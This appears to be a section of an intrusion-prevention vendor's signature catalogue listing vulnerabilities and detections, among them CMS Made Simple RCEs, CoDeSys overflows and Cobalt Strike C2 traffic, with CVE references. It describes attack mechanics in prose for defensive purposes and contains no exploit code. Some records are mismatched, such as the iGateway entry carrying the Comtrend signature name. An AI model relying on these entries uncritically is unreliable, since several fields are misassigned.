http://www.securityfocus.com/bid/25063

Click2findnow

About this vulnerability:	Click2FindNow
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Click2FindNow
Type:	Misconfiguration
Description:	Click2FindNow is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Click2findnow

ClickSpring-PuritySCAN-Application-Usage

About this vulnerability:	ClickSpring.PuritySCAN Application Usage
Risk:	Low
First detected in:	sgpkg-ips-111-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ClickSpring.PuritySCAN
Type:	Misconfiguration
Description:	ClickSpring.PuritySCAN may be considered unwanted software by many organizations. ClickSpring.PuritySCAN is an adware application that delivers targeted advertising to the user's desktop and transmits the user's browsing history back to the vendor.
Situation:	HTTP_CSH-ClickSpring-PuritySCAN-Application-Usage

Clinics-Patient-Management-System-PHP-File-Upload

About this vulnerability:

A vulnerability in Clinic's Patient Management System

Risk:

Moderate

First detected in:

sgpkg-ips-1815-5242

Last changed:

sgpkg-ips-1815-5242

Platform:

Generic

Software:

Clinic's Patient Management System

Type:

Input Validation

Description:

Insufficient sanitization of request contents causes a file upload vulnerability in Clinic's Patient Management System. A successful exploitation allows an attacker to upload and execute arbitrary files on the target system.

Situation:

HTTP_CS-Clinics-Patient-Management-System-PHP-File-Upload

References:

CVE-2022-40471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40471

Clipbucket-File-Upload-And-Command-Injection

About this vulnerability:	A Clipbucket File Upload And Command Injection Vulnerability
Risk:	High
First detected in:	sgpkg-ips-1075-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Clipbucket
Type:	Input Validation
Description:	A vulnerability in Clipbucket, versions before 4.0.0 (Release 4902), which allows remote attackers to upload malicious PHP files and inject OS and SQL commands, due to the insufficient input validation.
Situation:	HTTP_CS- Clipbucket-File-Upload-And-Command-Injection

Clorius-Controls-ICS-SCADA-Information-Disclosure

About this vulnerability:

A vulnerability in Clorius Controls ICS SCADA

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Clorius Controls ICS SCADA

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Clorius Controls ICS SCADA which allows an attacker to retrieve the firmware version, internal IP address and MAC adddress of the device without authentication.

Situation:

HTTP_CSU-Clorius-Controls-ICS-SCADA-Information-Disclosure-Attempt

References:

BID-58800
http://www.securityfocus.com/bid/58800

Cloudme-Sync-Stack-Based-Buffer-Overflow

About this vulnerability:

A Cloudme Sync Stack-Based Buffer Overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1071-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CloudMe Sync

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability in CloudMe Sync, version 1.10.9, which allows remote attackers to control the program execution flow and execute arbitrary code via the client application listening on port 8888.

Situation:

Generic_CS-Cloudme-Sync-Stack-Based-Buffer-Overflow

References:

CVE-2018-6892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6892

Clowncryptor-Infection-Traffic

About this vulnerability:	Clowncryptor infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Clowncryptor infection traffic was detected.
Situation:	HTTP_CRL-Clowncryptor-Infection-Traffic

Cmail-Email-Address-Processing-BOF

About this vulnerability:

CMail Address Processing Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-333-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CMail mail server

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in the CMail mail server. Novell GroupWise. The vulnerability is due to an error while processing specially crafted SMTP requests. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

SMTP_Mail-From-Recipient-Name-BOF

References:

CVE-1999-1521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1521

BID-633
http://www.securityfocus.com/bid/633

CMS-Made-Simple-Authenticated-RCE-Via-Object-Injection

About this vulnerability:

A vulnerability in CMS Made Simple

Risk:

High

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CMS Made Simple

Type:

Input Validation

Description:

There exists a vulnerability in CMS Made Simple, versions 2.2.6, 2.2.7, 2.2.8, 2.2.9, and 2.2.9.1, which allows remote attackers to execute remote code due to insufficient user input validation in the DesignManager module.

Situation:

HTTP_CS-CMS-Made-Simple-Authenticated-RCE-Via-Object-Injection

References:

CVE-2019-9055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9055

CMS-Made-Simple-Cache-Poisoning

About this vulnerability:

A vulnerability in CMS Made Simple

Risk:

High

First detected in:

sgpkg-ips-779-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CMS Made Simple

Type:

Input Validation

Description:

There exists a cache poisoning vulnerability in CMS Made Simple versions prior to 2.1.3 and 1.12.2.

Situation:

HTTP_CSH-CMS-Made-Simple-Cache-Poisoning

References:

CVE-2016-2784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2784

CMS-Made-Simple-Login.php-Remote-Password-Reset-Vulnerability

About this vulnerability:

A vulnerability in CMS Made Simple

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CMS Made Simple

Type:

Malfunction

Description:

There has been reported a remote password reset vulnerability in CMS Made Simple. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request of password reset to the target system. Successful exploitation allows the attacker to change users' passwords.

Situation:

HTTP_CRL-CMS-Made-Simple-Login.php-Remote-Password-Reset-Vulnerability

References:

CVE-2018-10081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10081

CMS-Made-Simple-RCE

About this vulnerability:

A vulnerability in CMS Made Simple

Risk:

Moderate

First detected in:

sgpkg-ips-1117-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CMS Made Simple

Type:

Misconfiguration

Description:

A vulnerability in CMS Made Simple, versions 2.2.5 and 2.2.7, which allows remote attackers to execute arbitrary code by allowing the user to remotely upload a malicious file, rename the file with a .php extension, and execute.

Situation:

HTTP_CS-CMS-Made-Simple-RCE

References:

CVE-2018-1000094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000094

CMS-Made-Simple-Showtime2-File-Upload-RCE

About this vulnerability:

A vulnerability in CMS Made Simple

Risk:

High

First detected in:

sgpkg-ips-1197-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CMS Made Simple

Type:

Insecure Configuration

Description:

A vulnerability in CMS Made Simple, versions 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2, which allows remote attackers to upload malicious PHP files and execute remote code via the class class.showtime2_image.php.

Situation:

HTTP_CS-CMS-Made-Simple-Showtime2-File-Upload-RCE

References:

CVE-2019-9692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9692

CMS-Made-Simple-Smarty-Serverside-Template-Injection

About this vulnerability:

A vulnerability in CMS Made Simple

Risk:

Moderate

First detected in:

sgpkg-ips-1333-5242

Last changed:

sgpkg-ips-1333-5242

Platform:

Generic

Software:

CMS Made Simple

Type:

Input Validation

Description:

There exists a server side template injection vulnerability in CMS Made Simple. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-CMS-Made-Simple-Smarty-Serverside-Template-Injection

References:

CVE-2021-26120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26120

CmsMadeSimple-Authenticated-File-Manager-RCE-CVE-2023-36969

About this vulnerability:

A vulnerability in CMS Made Simple

Risk:

Moderate

First detected in:

sgpkg-ips-1862-5242

Last changed:

sgpkg-ips-1862-5242

Platform:

Generic

Software:

CMS Made Simple

Type:

Input Validation

Description:

A vulnerability in CMS Made Simple, versions v2.2.21 and before, which allows remote attackers to upload files with the .phar or .phtml extensions, enabling execution of PHP code on the target system leading to RCE.

Situation:

HTTP_CS-CmsMadeSimple-Authenticated-File-Manager-RCE-CVE-2023-36969

References:

CVE-2023-36969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36969

Cobalt-Strike-Beacon-File

About this vulnerability:	Cobalt Strike beacon was detected
Risk:	High
First detected in:	sgpkg-ips-1383-5242
Last changed:	sgpkg-ips-1761-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Cobalt Strike beacon was detected.
Situation:	File-Text_Cobalt-Strike-Beacon-File File-Binary_Possible-Cobalt-Strike-Beacon-Download File-Exe_Cobalt-Strike-Beacon-File

Cobalt-Strike-C2-HTTP-Traffic

About this vulnerability:	Cobalt Strike C2 HTTP traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1373-5242
Last changed:	sgpkg-ips-1423-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	An HTTP request that matches known Cobalt Strike command and control traffic patterns has been detected. This might indicate presence of a Cobalt Strike Beacon on the client system.
Situation:	HTTP_CRL-Cobalt-Strike-C2-HTTP-Traffic HTTP_CSH-Cobalt-Strike-C2-HTTP-Traffic

Cobalt-Strike-Injector-File

About this vulnerability:	Cobalt Strike injector file was detected
Risk:	High
First detected in:	sgpkg-ips-1383-5242
Last changed:	sgpkg-ips-1383-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Cobalt Strike injector file was detected.
Situation:	File-Text_Cobalt-Strike-Injector-File File-TextId_Cobalt-Strike-Injector-File

Cobalt-Strike-Named-Pipe-Infection-Traffic

About this vulnerability:	A named pipe used by Cobalt Strike detected
Risk:	High
First detected in:	sgpkg-ips-1384-5242
Last changed:	sgpkg-ips-1384-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A named pipe used by Cobalt Strike was detected.
Situation:	SMB-TCP_Cobalt-Strike-Named-Pipe

Cobalt-Strike-Self-Signed-TLS-Certificate

About this vulnerability:	A Self-signed TLS certificate of Cobalt Strike was detected
Risk:	High
First detected in:	sgpkg-ips-1268-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	A Self-signed TLS certificate used by Cobalt Strike was detected. This might indicate that the system from where the traffic originated is compromised.
Situation:	TLS_SS-Cobalt-Strike-Self-Signed-TLS-Certificate

Cockpit-CMS-NoSQLi-To-RCE

About this vulnerability:

A vulnerability in Cockpit CMS.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Generic

Software:

Cockpit CMS

Type:

Input Validation

Description:

A vulnerability in Cockpit CMS, versions 0.10.0 - 0.11.1, which allows remote attackers to retrieve user lists and reset user passwords via NoSQL injections, CVE-2020-35846 and CVE-2020-35847, then allowing code injection via /accounts/find after authentication.

Situation:

HTTP_CRL-Cockpit-CMS-NoSQLi-To-RCE

References:

CVE-2020-35846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35846

CocoaPods-Trunk-Server-Remote-Code-Execution-CVE-2024-38366

About this vulnerability:

An attempt to exploit a vulnerability in CocoaPods detected

Risk:

High

First detected in:

sgpkg-ips-1748-5242

Last changed:

sgpkg-ips-1748-5242

Platform:

Generic

Software:

CocoaPods

Type:

Input Validation

Description:

trunk.cocoapods.org is the authentication server for the CoacoaPods dependency manager. The part of trunk which verifies whether a user has a real email address on signup used a rfc-822 library which executes a shell command to validate the email domain MX records validity. It works via an DNS MX. This lookup could be manipulated to also execute a command on the trunk server, effectively giving root access to the server and the infrastructure. This RCE triggered a full user-session reset, as an attacker could have used this method to write to any Podspec in trunk.

Situation:

File-Text_CocoaPods-Trunk-Server-Remote-Code-Execution-CVE-2024-38366

References:

CVE-2024-38366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38366

CoCSoft-Stream-Down-Buffer-Overflow

About this vulnerability:

A CoCSoft Stream Down Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CoCSoft Stream Down

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in CoCSoft Stream Down 6.8.0 which allows remote attackers to execute arbitrary code via a long response to a download request.

Situation:

Generic_SS-CoCSoft-Stream-Down-Buffer-Overflow

References:

CVE-2011-5052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5052

BID-51190
http://www.securityfocus.com/bid/51190

OSVDB-78043
http://www.osvdb.org/78043

CodeIgniter-Common.php-Insecure-Deserialization

About this vulnerability:

A vulnerability in CodeIgniter PHP framework.

Risk:

High

First detected in:

sgpkg-ips-1435-5242

Last changed:

sgpkg-ips-1435-5242

Platform:

Generic

Software:

CodeIgniter

Type:

Input Validation

Description:

A vulnerability in CodeIgniter PHP framework, before 4.1.6, which allows remote attackers to execute arbitrary code on a target system by sending crafted traffic, due to insufficient validation of serialized data sent to the old function in Common.php.

Situation:

HTTP_CS-CodeIgniter-Common.php-Insecure-Deserialization

References:

CVE-2022-21647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21647

Codesys-Gateway-Server-DoS-Vulnerability

About this vulnerability:	A vulnerability in CoDeSys Gateway Server
Risk:	Moderate
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Smart Software Solutions CoDeSys
Type:	Malfunction
Description:	There is a denial of service vulnerability in CoDeSys Gateway Server
Situation:	Generic_CS-Codesys-Gateway-Server-DoS-Vulnerability

Codesys-Gateway-Server-Opcode-0x3ef-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Smart Software Solutions CoDeSys

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Smart Software Solutions CoDeSys

Type:

Buffer Overflow

Description:

3S Smart Software CoDeSys has an input validation vulnerability which can be exploited to cause a denial of service condition by terminating the service.

Situation:

Generic_CS-Codesys-Gateway-Server-Opcode-0x3ef-Heap-Buffer-Overflow

References:

CVE-2015-6460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6460

Codesys-V3-Cmprouter-And-Cmprouterembedded-Integer-Overflow

About this vulnerability:

A vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone

Risk:

Moderate

First detected in:

sgpkg-ips-1241-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Smart Software Solutions CoDeSys

Type:

Integer Overflow

Description:

Improper validation of protocol messages causes an integer overflow vulnerability in Smart Software Solutions CodeSys. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Codesys-V3-Cmprouter-And-Cmprouterembedded-Integer-Overflow

References:

CVE-2019-5105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5105

Codesys-V3-Cmpwebserver-And-Cmpwebserverhandler-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone

Risk:

Moderate

First detected in:

sgpkg-ips-1212-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Smart Software Solutions CoDeSys

Type:

Buffer Overflow

Description:

Improper validation of inputs to the /WebVisuV3 path causes a heap buffer overflow vulnerability in Smart Software Solutions CoDeSys Control. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the server process.

Situation:

HTTP_CS_Codesys-V3-Cmpwebserver-And-Cmpwebserverhandler-Heap-Buffer-Overflow

References:

CVE-2019-18858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18858

Codesys-V3-Cmpwebserverhandler-Memgcgetsize-Integer-Overflow

About this vulnerability:

A vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone

Risk:

Moderate

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Smart Software Solutions CoDeSys

Type:

Integer Overflow

Description:

Improper validation of user-sent data causes an integer overflow vulnerability in CoDeSys V3 run-time system's web server. A successful exploit may allow an attacker to run arbitrary code with the privileges of the target process.

Situation:

HTTP_CSH-Codesys-V3-Cmpwebserverhandler-Memgcgetsize-Integer-Overflow

References:

CVE-2020-10245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10245

Cogent-DataHub-DirTrav

About this vulnerability:	Cogent DataHub Directory Traversal Vulnerability 0-day
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Cogent DataHub
Type:	Directory Traversal
Description:	A directory traversal vulnerability in Cogent DataHub allowing remote attackers to discover and download the files on disk where it is installed.
Situation:	HTTP_CSU-Cogent-DataHub-DirTrav

Cogent-Datahub-Remote-Unicode-Buffer-Overflow

About this vulnerability:

A vulnerability Cogent Datahub

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cogent DataHub

Type:

Buffer Overflow

Description:

There are multiple stack-based buffer overflows in Cogent DataHub which allows remote attacker to cause a denial of service via crafted commands.

Situation:

Generic_CS-Cogent-Datahub-Remote-Unicode-Buffer-Overflow

References:

CVE-2011-3493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3493

Cogent-Datahub-Web-Server-Getpermissions.asp-Command-Injection

About this vulnerability:

A vulnerability in Cogent DataHub

Risk:

Moderate

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cogent DataHub

Type:

Input Validation

Description:

A remote command injection vulnerability has been reported in Cogent DataHub. The vulnerability is due to insufficient validation within the GetPermissions.asp page. A remote attacker can exploit this vulnerability by submitting a maliciously crafted request to GetPermissions.asp. This can result in arbitrary command execution on the vulnerable system.

Situation:

HTTP_CRL-Cogent-Datahub-Web-Server-Getpermissions.asp-Command-Injection

References:

CVE-2014-3789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3789

BID-67486
http://www.securityfocus.com/bid/67486

OSVDB-107097
http://www.osvdb.org/107097

Coinhive-Monero-JavaScript-Miner

About this vulnerability:	Coinhive Monero JavaScript Miner
Risk:	High
First detected in:	sgpkg-ips-1032-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Monero
Type:	Javascript Injection
Description:	A page was accessed that contains Coinhive Monero Javascript Miner. Coinhive Monero Javascript Miner is a digital currency miner, which uses processor power of the visitor's computer without permission to mine digital currency called "Monero". This activity happens in background and it isn't visible to the visitor. Original Coinhive Monero Javascript Miner doesn't infect the visitor's computer with malware.
Situation:	File-Text_Coinhive-Monero-JavaScript-Miner File-Text_Coinhive-Miner

Coinminer-Trojan-Traffic

About this vulnerability:	An XMRig cryptocoin miner
Risk:	High
First detected in:	sgpkg-ips-1345-5242
Last changed:	sgpkg-ips-1528-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Traffic patterns corresponding to a possible XMRig cryptocoin miner.
Situation:	File-Text_Coinminer-Trojan-Traffic Generic_CS-Coinminer-Trojan-Traffic

Colloquy-IRC-Channel-Invite-Format-String-DoS

About this vulnerability:

Colloquy IRC Channel Invite Format String DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-673-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Colloquy

Type:

Input Validation

Description:

A vulnerability exists in Colloquy 2.1 and before which allows remote attackers to cause a denial of service condition, and possibly execute arbitrary code by using format string specifiers in the Channel name of an INVITE request.

Situation:

Generic_SS-Colloquy-IRC-Channel-Invite-Format-String-DoS

References:

CVE-2007-0344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0344

BID-22086
http://www.securityfocus.com/bid/22086

OSVDB-32688
http://www.osvdb.org/32688

Command-Interpreter-In-Cgi

About this vulnerability:

Command interpreter in CGI directory

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic HTTP server

Type:

Insecure Configuration

Description:

A generic command interpreter such as zsh, csh, bash, sh, or perl is in the cgi directory of the Web server. In the worst case, the interpreter can be used to obtain full system control as it can execute arbitrary commands.

Situation:

HTTP_CSU-Command-Interpreter-In-Cgi

References:

CVE-1999-0509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0509

Common-Command-Injection-String

About this vulnerability:	A common command injection string in URI
Risk:	High
First detected in:	sgpkg-ips-613-5211
Last changed:	sgpkg-ips-1865-5242
Platform:	Generic
Software:	<os>
Type:	Script Injection
Description:	A suspicious string in URI parameters may indicate a script injection attempt.
Situation:	HTTP_CSU-Common-Command-Injection-String HTTP_CSU-Common-Command-Injection-String-2 HTTP_CSU-Common-Command-Injection-String-3

CommuniGate-Pro-LDAP-Server-Bind-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the processing of bind request in CommuniGate Pro

Risk:

High

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CommuniGate Pro

Type:

Buffer Overflow

Description:

The CommuniGate Pro product has a vulnerability in the LDAP (Lightweight Directory Access Protocol) service. The service fails to correctly process the length information of the user credentials field in bind request message. Certain length values will cause integer overflow in the service. This vulnerability can be used to cause denial of service and possibly to make injected code execution attacks against the vulnerable service.

Situation:

LDAP_CommuniGate-Pro-LDAP-Server-Bind-Request-Buffer-Overflow

References:

CVE-2006-0468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0468

BID-16407
http://www.securityfocus.com/bid/16407

Commvault-Commcell-Cvsearchservice-Downloadfile-Authentication-Bypass

About this vulnerability:

A vulnerability in Commvault CommCell

Risk:

Moderate

First detected in:

sgpkg-ips-1418-5242

Last changed:

sgpkg-ips-1418-5242

Platform:

Generic

Software:

Commvault CommCell

Type:

Malfunction

Description:

The use of hardcoded credentials to access CVSearchService endpoint causes an authentication bypass vulnerability in Commvault CommCell. A successful exploit allows an attacker to execute arbitrary code on the target with system privileges.

Situation:

HTTP_CS-Commvault-Commcell-Cvsearchservice-Downloadfile-Authentication-Bypass

References:

CVE-2021-34996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34996

Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Commvault CommCell

Risk:

Moderate

First detected in:

sgpkg-ips-1429-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

Commvault CommCell

Type:

Input Validation

Description:

Improper validation of the uploaded file path in DownloadCenterUploadHandler class causes an arbitrary file upload vulnerability in Commvault CommCell. A successful exploit allows an attacker to upload arbitrary files on the target system to be executed with system privileges.

Situation:

HTTP_CRL-Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload
File-TextId_Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload

References:

CVE-2021-34995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34995

Computer-Associates-ARCserve-Backup-Discovery-Service-Denial-Of-Service

About this vulnerability:

A vulnerability in Computer Associates ARCserve Backup

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup; Computer Associates Business Protection Suite; Computer Associates Server Protection Suite

Type:

Malfunction

Description:

There is a denial of service vulnerability in Computer Associates ARCserve Backup Discovery service. The vulnerability is due to insufficient input validation by casdscsvc.exe. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted message to the target server that may lead to a denial of service condition.

Situation:

Generic_CS-Computer-Associates-ARCserve-Backup-Discovery-Service-DoS

References:

CVE-2008-1979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1979

BID-28927
http://www.securityfocus.com/bid/28927

Computer-Associates-BrightStor-Arcserve-Backup-MediaSRV.exe-Buffer-Overflow

About this vulnerability:

Computer Associates BrightStor Arcserve Backup MediaSRV.exe Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-674-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup

Type:

Buffer Overflow

Description:

A vulnerability exists in Computer Associates BrightStor ARCserve Backup 11.5 SP2 build 4237 which allows remote attackers to execute arbitrary code via crafted xdr_handle_t RPC packets.

Situation:

Generic_UDP-Computer-Associates-BrightStor-Arcserve-Backup-MediaSRV.exe-Buffer-Overflow

References:

CVE-2007-1785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1785

BID-23209
http://www.securityfocus.com/bid/23209

Computer-Associates-iGateway-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Computer Associates iGateway 3.0 and 4.0 before 4.0.050623

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates iTechnology iGateway

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Computer Associates iGateway, 3.0 and 4.0 before 4.0.050623, when running in debug mode, which allows remote attackers to execute arbitrary code via HTTP GET requests.

Situation:

Generic_CS-Computer-Associates-iGateway-Buffer-Overflow

References:

CVE-2005-3190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3190

BID-15025
http://www.securityfocus.com/bid/15025

OSVDB-19920
http://www.osvdb.org/19920

Computer-Associates-iGateway-Content-Length-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of HTTP Content-Length field in the Computer Associates iGateway service

Risk:

Critical

First detected in:

sgpkg-ips-56-1210

Last changed:

sgpkg-ips-1584-5242

Platform:

Windows

Software:

Computer Associates iTechnology iGateway

Type:

Buffer Overflow

Description:

The Computer Associates iTechnology iGateway service fails to validate the value of the Content-Length field in an HTTP request. If the value of this field is negative or too large, a heap-based buffer overflow will occur. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the vulnerable system.

Situation:

HTTP_CSU-Comtrend-CT-5624-Router-Remote-Password-Disclosure

References:

CVE-2005-3653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3653

BID-16354
http://www.securityfocus.com/bid/16354

OSVDB-22688
http://www.osvdb.org/22688

Comtrend-CT-5624-Router-Remote-Password-Disclosure

About this vulnerability:

A vulnerability in Comtrend CT-5624 router

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Comtrend CT-5624 Router

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Comtrend CT-5624 routers which allows an attacker to retrieve sensitive information without authentication.

Situation:

References:

BID-50601
http://www.securityfocus.com/bid/50601

Conflicting-Content-Type-Header

About this vulnerability:	Conflict with Content-Type header and actual data
Risk:	Low
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Malfunction
Description:	There is a conflict between the actual data and the Content-Type header sent by the server. This condition might be a result of a misconfiguration of the server but it may also indicate an attack.
Situation:	File-Binary_Conflicting-Content-Type-JPEG File-OLE_Conflicting-Content-Type-Text File-OLE_Conflicting-Content-Type-Text-HTML File-OLE_Conflicting-Content-Type-Text-Plain File-Flash_Conflicting-Content-Type-Text File-Flash_Conflicting-Content-Type-Text-HTML File-Flash_Conflicting-Content-Type-Text-Plain File-PDF_Conflicting-Content-Type-Text File-PDF_Conflicting-Content-Type-Text-HTML File-PDF_Conflicting-Content-Type-Text-Plain File-Binary_Conflicting-Content-Type-Text File-Binary_Conflicting-Content-Type-Text-HTML File-Binary_Conflicting-Content-Type-Text-Plain File-JPEG_Conflicting-Content-Type-Text File-JPEG_Conflicting-Content-Type-Text-HTML File-JPEG_Conflicting-Content-Type-Text-Plain File-PNG_Conflicting-Content-Type-Text File-PNG_Conflicting-Content-Type-Text-HTML File-PNG_Conflicting-Content-Type-Text-Plain File-GIF_Conflicting-Content-Type-Text File-GIF_Conflicting-Content-Type-Text-HTML File-GIF_Conflicting-Content-Type-Text-Plain File-RTF_Conflicting-Content-Type-Text File-RTF_Conflicting-Content-Type-Text-HTML File-RTF_Conflicting-Content-Type-Text-Plain File-RTF_Conflicting-Content-Type-Word-Doc File-RIFF_Conflicting-Content-Type-Text File-RIFF_Conflicting-Content-Type-Text-HTML File-RIFF_Conflicting-Content-Type-Text-Plain File-MPEG_Conflicting-Content-Type-Text File-MPEG_Conflicting-Content-Type-Text-HTML File-MPEG_Conflicting-Content-Type-Text-Plain File-Zip_Conflicting-Content-Type-Text File-Zip_Conflicting-Content-Type-Text-HTML File-Zip_Conflicting-Content-Type-Text-Plain File-Exe_Conflicting-Content-Type-Text File-Exe_Conflicting-Content-Type-Text-HTML File-Exe_Conflicting-Content-Type-Text-Plain

Confluence-Access-Control-Vulnerability-CVE-2023-22515

About this vulnerability:

A vulnerability in Confluence Data Center and Server

Risk:

High

First detected in:

sgpkg-ips-1640-5242

Last changed:

sgpkg-ips-1640-5242

Platform:

Generic

Software:

Confluence

Type:

Malfunction

Description:

A broken access control vulnerability has been reported in Confluence Data Center and Server. Successfully exploiting this vulnerability allows an unauthenticated attacker to create a new Confluence user with administrator privileges.

Situation:

HTTP_CRL-Confluence-Access-Control-Vulnerability-CVE-2023-22515
